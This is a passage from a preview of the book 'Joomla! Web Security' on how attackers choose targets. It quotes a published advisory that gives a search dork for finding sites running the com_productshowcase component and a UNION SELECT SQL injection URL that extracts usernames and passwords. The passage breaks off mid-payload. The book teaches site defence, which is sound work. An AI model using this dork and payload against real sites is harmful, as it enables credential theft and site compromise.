Book Image

Joomla! Web Security

Book Image

Joomla! Web Security

Overview of this book

Table of Contents (16 chapters)
Joomla! Web Security
Credits
About the Author
About the Reviewer
Preface

Acquiring Target


In a military sense, when a "weapons platform" is searching for a target, it will be in acquiring target mode. This simply means it is still searching for the target.

The bad guys do the same thing; they "acquire" or choose targets. Once they have chosen a target, the real work begins.

In this, I'll make a distinction between the really skilled crackers (the pros as I call them) and the kids who use their stuff.

Let me give you an example from a recent vulnerability discovered and posted on the site www.milw0rm.com:

########################################## # # Joomla Component com_productshowcase SQL Injection ########################################### ##AUTHOR : S@BUN ########################################### # # DORKS 1 : allinurl :"com_productshowcase" # ###########################################
EXPLOIT :
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id= -99999/**/union/**/select/**/0,concat(username,0x3a,password), concat(username...